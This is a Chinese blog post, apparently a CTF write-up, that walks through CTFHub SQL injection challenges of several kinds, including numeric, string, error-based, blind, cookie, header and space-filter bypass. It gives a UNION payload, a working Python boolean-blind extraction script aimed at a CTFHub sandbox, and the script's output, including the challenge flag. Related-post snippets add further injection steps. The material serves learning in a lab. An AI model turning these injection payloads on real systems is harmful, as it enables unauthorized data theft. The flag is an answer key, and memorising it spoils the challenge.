ctfhub--ctf--web--sql注入(1.数字型注入2.字符型注入3.报错注入4.布尔盲注5.时间盲注6.mysql结构)

最新推荐文章于 2024-09-12 15:31:55 发布
最新推荐文章于 2024-09-12 15:31:55 发布
阅读量161 收藏
点赞数
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feiniaotjx/article/details/120584121
版权
本文详细介绍了SQL注入的多种类型,包括数字型、字符型、报错型、布尔盲注和时间盲注,并提供了Python代码示例进行实战演示。内容涵盖了数据库名、表名、字段名和字段内容的探测方法,以及如何应对空格过滤的策略。
摘要由CSDN通过智能技术生成

ctfhub--ctf--web--sql注入

1.数字型注入

查看字段数,2正常回显,3回显不正常,说明有两个字段数
在这里插入图片描述在这里插入图片描述
在这里插入图片描述查看数据库
在这里插入图片描述查表
在这里插入图片描述查字段-1 union select column_name,2 from information_schema.columns where table_name='flag'--+
回显字段内容为flag

查字段内容
在这里插入图片描述

2.字符型注入

输入'闭合前面的'
在这里插入图片描述查字段数
在这里插入图片描述
在这里插入图片描述查库
在这里插入图片描述查表

在这里插入图片描述查字段
在这里插入图片描述查字段内容
在这里插入图片描述

3.报错注入

根据报错返回的信息注入
在这里插入图片描述查库
在这里插入图片描述查表
在这里插入图片描述查字段
在这里插入图片描述查字段内容
在这里插入图片描述

4.布尔盲注

返回提示正确或错误信息,通过此信息逐个判断库,表,字段,字段内容

import requests

url='http://challenge-479ffa751e269b95.sandbox.ctfhub.com:10800/?id=1+'

for i in range(1,5):
    urls=url+'and+length(database())='+str(i)+'--+'
    data=requests.get(urls)
    if 'query_success' in data.text:
        c=i
        print('数据库名长度为:'+str(c))
    else:
        pass

p=int(c)+1
e=''

for a in range(1,5):
    for b in 'qwertyuiopasdfghjklzxcvbnm':
        urlss=url+'and+substr(database(),'+str(a)+',1)='+'\''+str(b)+'\'' +'--+'
        d=requests.get(urlss)
        if 'query_success' in d.text:
            e=e+str(b)
        else:
            pass     
print('数据库名为:'+e)
s=str(e)
for f in range(1,10):
        urlsss=url+'and+length((select+table_name+from+information_schema.tables+where+table_schema='+'\''+s+'\''+'+limit+0,1))='+str(f)+'--+'
        da=requests.get(urlsss)
        if 'query_success' in da.text:
            g = f
            print('表名长度为:' + str(g))
        else:
            pass


w=int(g)+1
k=''
for h in range(1,w):
    for j in 'qwertyuiopasdfghjklzxcvbnm':
        urlssss=url+'and+substr(( select+table_name+from+information_schema.tables+where+table_schema='+'\''+s+'\''+'+limit+0,1),'+str(h)+',1)='+'\''+str(j)+'\''+'--+'

        dd=requests.get(urlssss)
        if 'query_success' in dd.text:
            k=k+str(j)
        else:
            pass     
print('表名为:'+k)
n=str(k)

for m in range(1,5):
    ur=url+'and+length((select+group_concat(column_name)+from+information_schema.columns+where+table_name='+'\''+n+'\''+'+limit+0,1))='+str(m)+'--+'
    ddd=requests.get(ur)
    if 'query_success' in ddd.text:
        v=m
        print('字段数为:'+str(m))
    else:
        pass

p=v+1
y=''
for r in range(1,p):
    for t in 'qwertyuiopasdfghjklzxcvbnm':
        us=url+'and+substr((select+group_concat(column_name)+from+information_schema.columns+where+table_name='+'\''+str(n)+'\''+'+limit+0,1),'+str(r)+',1)='+'\''+str(t)+'\''+'--+'

        dt=requests.get(us)
        if 'query_success' in dt.text:
            y=y+str(t)
        else:
            pass
print('字段为:'+y)
yy=str(y)
try:
    zzz=''
    for z in range(1,100):
        for zz in '0123456789qwertyuioplkjhgfdsazxcvbnm{}':
            ul=url+'and+substr((select+'+yy+'+from+'+n+'),'+str(z)+',1)='+'\''+zz+'\''+'--+'
            dt=requests.get(ul)
            if 'query_success' in dt.text:
                zzz=zzz+str(zz)
            else:
                pass
    print(zzz)
except:
    print(z)


D:\pycharm\wenjian\venv\Scripts\python.exe D:/pycharm/wenjian/Boolean.py
数据库名长度为:4
数据库名为:sqli
表名长度为:4
表名为:flag
字段数为:4
字段为:flag
ctfhub{1a044624d95239e51725397a}

Process finished with exit code 0

5.时间盲注

使用sqlmap
在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

6.mysql结构

查库
在这里插入图片描述查表
在这里插入图片描述查字段
在这里插入图片描述查字段内容
在这里插入图片描述

7.cookie注入

查看是否为注入点,正常回显,说明存在注入点
在这里插入图片描述查库
在这里插入图片描述
查表在这里插入图片描述查字段
在这里插入图片描述查字段内容
在这里插入图片描述

8.UA注入

查库
在这里插入图片描述查表
在这里插入图片描述查字段
在这里插入图片描述查字段内容
在这里插入图片描述

9.Refer注入

添加referer,查库
在这里插入图片描述
查表在这里插入图片描述查字段
在这里插入图片描述查字段内容
在这里插入图片描述

10.过滤空格

空格被过滤,可使用注释符/**/代替空格
查库
在这里插入图片描述查表
在这里插入图片描述查字段
在这里插入图片描述查字段内容
在这里插入图片描述

F。N 嘿嘿
关注
[NSSRound#1 Basic]sql_by_sql - 二次注入+布尔盲注||sqlmap
oZuoShen123的博客
10-06 377
用burpsuite抓包,判断id类,使用id=1 or 1=1,如果是字符则会提示不存在,但是这里明显可以执行,说明id是数字型。1、所以先注册名为:admin’–+的用户,这样就可以直接修改admin密码,登录后,获取cookie。——如果这里的url写错了,是查不到的,而且cookie很重要,非admin的cookie无法进行查询。此时如果我们注册的用户名是admin’–+、admin’#、admin’–的话。1、构造sql注入语句,由于sqllite数据库sql的保留字会有所区别。
CTFHub SQL注入 数字型注入
weixin_49541539的博客
01-25 274
CTFHub SQL注入 数字型注入 题目 题目如下: 打开工具sqlmap开始注入,-u表示-url,指定url,-dbs代表枚举数据库管理系统数据库 结果如下: 查看当前是那个数据库,-current-db代表检索数据库管理系统当前数据库 运行结果: 查看当前数据库-D代表指定数据库名,-tables代表枚举数据库中的表 运行结果: 再看flag表里的数据,-T代表指定表格,–columns代表枚举列数据 结果: 在查看flag列的数据,-C代表指定列,-dump代表转储数据库管理系统的数
CTF学习笔记2:iwebsec-SQL注入漏洞-01-数字型注入
lvx++的博客
01-22 3728
提示:本篇为最简单的SQL注入入门,是在自己本地虚拟机的靶场上练习,为的是了解安全防御技术。切勿在未经授权的情况下,测试或攻击他人网站或系统,否则将承担法律责任!请学习《网络安全法》。 一、解题过程 用到的工具:Chrome浏览器和HackerBar插件 (一)题目概览 1.题目路径 2.HackerBar使用 3.测试结果集列数为3列 ?id=1 order by 4 4.给id传递-1再用union select查询自己想要的数据 (1)取得当前应用的数据库名 ?id=-1 union sele
[CTFHub]整数注入webSQL注入
ZXW_NUDT的博客
05-12 314
输入1后发现url改变 使用order by语句查询字段数 使用union联合查询检测信息回显位置 由于页面只允许返回一行内容,所以则修改参数1为-1,使需要查询的信息回返 获取当前数据库名 获取所有数据库名 查询数据库sqli表名 获取flag列所有字段名 获取指定数据库的表的列的内容 ...
CTFHub ---> SQL注入!!
huohaowen的博客
02-27 1463
今天大一下ctfhubsql注入的靶场!!!
CTFHUB-WEB-SQL注入-整数注入
weixin_43486981的博客
08-10 535
SQL注入: 题目: 靶机环境 输入1后,查看页面信息 求列数 求显示位 求数据库名 求数据表名 求列名 求字段值
CTFHUB-web-SQL注入
ookami6497的博客
11-29 817
CTFHUB SQL
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 430
个人CTF学习之路
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7132
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTF-Web-SQL注入
beihai2013
01-26 3288
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入sql的show语句,sql的预编译,sql修改表 参考:https:/
CTF从零到一 SQL注入攻击
山兔的博客
09-12 462
1.SQL注入攻击是开发者在开发程序时,对客户输入的参数过滤不严格,导致用户能更改数据库。 一.数字型注入: 1.访问链接http://192.168.20.133/sqll.php?id=2的页面和http://192.168.20.133/sqll.php?id=3-1的页面一样,可以说明这个注入点是数字型注入。表现为源码输入点“$_GET['id']”附近没有引号包裹。 2.链接模板:http://192.168.20.133/sqll.php?id=1 union select user,pwd f
CTF入门之SQL注入
PolarPeak的博客
12-08 2230
一、字符注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
CTFHub | 整数注入
尼泊罗河伯的博客
10-25 2578
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
CTFHub 整数SQL注入
Leon~博客
03-08 5709
1、整数SQL注入 (1)判断是否存在注入 1)加单引号 URL:http://challenge-4334fe95b292f4f7.sandbox.ctfhub.com:10080/?id=1’ 对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; 2)加and 1=1 URL:http:...
CTFHub(整数注入
sGanYu
07-24 2286
目录 SQL注入的前提 手动注入 sqlmap注入 SQL注入的前提 判断是否具备注入条件 可控参数如id=1,能否影响页面的显示结果 输入SQL语句的时候,是否报错,能否通过报错,看到数据库回显的一些语句痕迹 尝试使输入的语句不报错,使得成功闭合语句 判断是什么类注入 语句能否被修改 是否能够成功执行 手动注入 首先判断是否存在注入,输入1回显,输入2回显,输入3,无回显 根据回显内容判断为整数 开始爆字段id=1 order by 1,当id =1.
ctfhub 整数注入(手动注入
qq_54929891的博客
09-14 478
这段时间看了web安全里面有关sql注入以及一些博客,终于基本了解了一下如何做这种题目用手动注入 第一步,判断是否有注入点(构造sql语句来比对不同) 这是按照提示输入1回显结果,我们可以利用恒真恒假来判断是否修改语句有用 发现输入恒假1=2的时候没有回显,代表有注入点,可以改变sql语句 第二步 利用order by来获取回显的信息判断字段数(因为这个题目没有引号,加不加#省略号没有影响) 发现字段数为2,order by 3的时候没有回显利用1 and 1=2恒假语句来把原先的..
sqlalchemy JSON 字段写入时中文序列化问题
最新发布
llc的博客
09-12 331
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
SQL(结构性查询语句)
2301_78693337的博客
09-11 465
以上就是今天要讲的内容,本文介绍了基础的SQL语法使用,而sql还提供了大量能使我们快速便捷地处理数据的函数和方法等着我们探索。
大数据-132 - Flink SQL 基本介绍 与 HelloWorld案例
永远好奇,无限进步!
09-12 2336
Flink SQL 是 Apache Flink 提供的一种高层次的查询语言接口,它基于 SQL 标准,为开发者提供了处理流式数据和批处理数据的能力。Flink SQL 允许用户使用标准 SQL 查询语言在数据流和数据表上执行复杂的操作,适用于多种应用场景,如实时分析、数据流处理、机器学习等。Flink SQL 的一大特点是流处理和批处理的统一性。通过同一套 SQL 语法,用户可以同时处理静态数据(批处理)和动态数据(流处理)。这使得应用程序的开发更加简化,因为可以用相同的逻辑编写实时流数据处理和历史数据的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值